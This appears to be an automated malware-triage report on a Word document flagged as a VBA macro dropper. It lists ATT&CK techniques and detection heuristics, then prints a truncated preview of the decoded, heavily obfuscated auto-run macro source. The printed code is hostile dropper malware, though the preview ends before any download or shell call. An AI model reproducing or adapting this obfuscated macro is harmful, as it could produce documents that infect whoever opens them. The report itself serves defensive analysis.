Verdict: MALICIOUS
Risk Score: 204

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The 'OLE_VBA_SHELL' heuristic firing indicates the macro attempts to execute commands. The presence of the 'macros.bas' file and the 'OLE_VBA_AUTOOPEN' heuristic confirm the macro is designed to run automatically upon opening. The ClamAV detection 'Doc.Dropper.Agent-6459455-0' further supports its malicious nature as a dropper.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-6459455-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6459455-0
- VBA macros detected [medium, 2 related findings, OLE_VBA_MACROS]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 89307 bytes |

SHA-256: e3dda091a6da59c413d947044d3ef51b34755528d149a559a1d5a2a15be0d641

Detection (macros.bas)
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 29 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "lPlaicA"
Sub ptFPVjNJInPM()
On Error Resume Next
While pJcprIfCc < EfGkpbhHpL
Set BYEqilQjwzAY = vFJkrUVkMQ
kPwYi = 5214991 + Round(ZAlolXzIWPS) - 6317644 * Cos(6128242) / HbokR + Chr(PVqCoIDGSprBUR)
XtHTmlizFR = kwcnIoQiQEJ / zdTsqhXQLOd
Wend
Select Case ijQfLjYllJX
Case 1332323
ihDlqAWNKI = SssQhATVTtFbX
SjfYzqFMOLAU = 6003739
Case 4058562
HVXXZNT = IDkpCnkZFfBY
qpNSlFdh = Rnd(3073905)
Case 2553675
wHMXhDwWz = Atn(9172603)
UMADZiluo = Fix(5754609 + 9320735 * 9491010 * jKFnHpGs)
End Select
For PqubNsBhiZVTU = 260414 To ijzwVYrC
wqXwKP = 1932301 - fdzKIwRstHzX
Select Case zLIoFbpJWR
Case 4589573
kfWVCWPPfnqE = ChrW(ZiiDbR - CSng(fhwfOKEnUfIMZ))
XSuXqkkHw = UEjjtG
Case 1167433
AjJCjrGsSbuAfi = ChrB(mBPojlhHXl)
KKdYtNZNLtLVm = 599361
End Select
zSIMwdpZ = Sitn - 8906967
For iSaJTYmRqh = OtihaSTlajckOn To 2869064
KpMUkjtPuzEsUZ = (763634 * 9260714 + UjYZfVLWn * Sin(wBhLVEZb - CDbl(iMLizTmaOa) * 3340854 * cjPuE) / 8132630 * CLng(4834979 - CDate(TAzzPvNMoi)) / vwbRJJEYGtvz + 9284611 / (SVVSQRNAw / dPNOEF - mfmWCAOFl / Int(9933335 - Round(SlXDBbzZ) + 8406532 / 8860329)))
Next
Next
End Sub
Function qvkikME()
On Error Resume Next
jRcXQQI = "WlCwfRwdfIKjnIW=%MMLzOTBadnlOkrYWhPlBUELUwrnXmN"
aZvoHiV = alzji = (4115434 * 6389660 + bVYNLQMAHHEhF * Sin(dlYWkiE - CDbl(YFQfzr) * 791038 * mOiOav) / 3657924 * CLng(7780649 - CDate(GiKRzbRvP)) / NKIlzp + 3803598 / (TwjTUwwVpzrkiS / zdzuqZdwjikq - ddiZGwzrsnNNUd / Int(7320037 - Round(EiYuZLHz) + 8975127 / 5663137)))
jhCQKsoSAZv = qwwkkGzrM = (3098001 * 3351483 + kTsEqmjVvr * Sin(fDLvZSWjfda - CDbl(twCcHX) * 7330971 * CnAnbhGQM) / 2705498 * CLng(1443292 - CDate(zSRhZKXZqj)) / AKKzIoKZwJRd + 8440641 / (XUsLF / QVwJbfVDw - MjWAAdQhwcCoIS / Int(6581384 - Round(ZiBqiNkJViLB) + 4701853 / 5591925)))
NaQNjznMDl = iuivbdfghnkjgyugjn(jRcXQQI, 25, 16)
rkQGJnbWKf = "wClOLiv% tes&jpEH"
CFXbGJ = WZdrAfukjYWiJ = (2925412 * 207826 + QVltAGHoM * Sin(nwVioFdYRzPm - CDbl(lMFkFspqTwqsjp) * 548042 * QRpiLsvOzjQEl) / 9483425 * CLng(766165 - CDate(dXAjvV)) / wXwUA + 6002782 / (IPbfBfaHmtQqm / bkEWukOIp - zuPsHNYvj / Int(1563179 - Round(BdGvYfVlGP) + 922631 / 6732700)))
rCwiLLkqn = VmtzGuaAZFh = (1453751 * 3091717 + AYVVGivZHwa * Sin(FsWiGsLjX - CDbl(UaoohabYY) * 7674248 * wVMluz) / 843713 * CLng(7120248 - CDate(fuWkphiqzpwhLf)) / ujRzV + 9692301 / (amNIXJzLuGw / qaDEzzwkZi - blqIrNjGPwwTj / Int(4473437 - Round(KUtnupijoir) + 5430257 / 3557190)))
RsosHVEq = iuivbdfghnkjgyugjn(rkQGJnbWKf, 5, 7)
dJTrjsJ = "PpwhJUVXMzEAJbIVTSzWrav% tes&PYZ"
DdGFANb = OkrUAErq = (5197083 * 2874176 + SZjFGrGMZwkHv * Sin(mdAFTRTjHB - CDbl(fSrsrzjVMwmfP) * 2646372 * HVOSddvtNbrk) / 1383094 * CLng(9413222 - CDate(jSiMbYPTh)) / DmjcAwksjKzVoX + 2927029 / (ZdRAPZYpPTA / mMsCj - aqMRMdGs / Int(4650327 - Round(ZOdGzrzlChjd) + 2775887 / 8731140)))
BoEPw = hzhFWRv = (7859644 * 4035514 + YYHRotWBlQBqtF * Sin(MHAwkwcSFffYmB - CDbl(dZIJYTrTN) * 7697065 * cccLqEc) / 1951348 * CLng(1985745 - CDate(vqkAwF)) / lIUkA + 3133496 / (bhjjcUnmKXUz / tobwcqLijXIbN - iFTccMpjIUwh / Int(8013461 - Round(JfMjzPIwj) + 4702775 / 1389817)))
GlGwmbwQkfu = iuivbdfghnkjgyugjn(dJTrjsJ, 4, 9)
PWEswYKoiQ = "vUspNFaBfXwImXdBQY% tesWYhk"
quIiZjV = iPzHZQ = (2732353 * 7759022 + RjVqYiZ * Sin(XBWmiEkqFY - CDbl(wUdujKUwwNRaB) * 8483863 * MCoaLmTIADqV) / 9991996 * CLng(2199645 - CDate(RUsUrqo)) / pjEibNGaVutr + 6509113 / (iMGdL / qppUljwzih - wYQzu / Int(1378222 - Round(rvudV) + 5167725 / 1319173)))
WGswj = jPpfNOfM = (9160662 * 9907882 + kwsQIsntuSRCk * Sin(ClPhNU - CDbl(NQCjHCT) * 7429984 * MVzDXHzf) / 7306
... (truncated)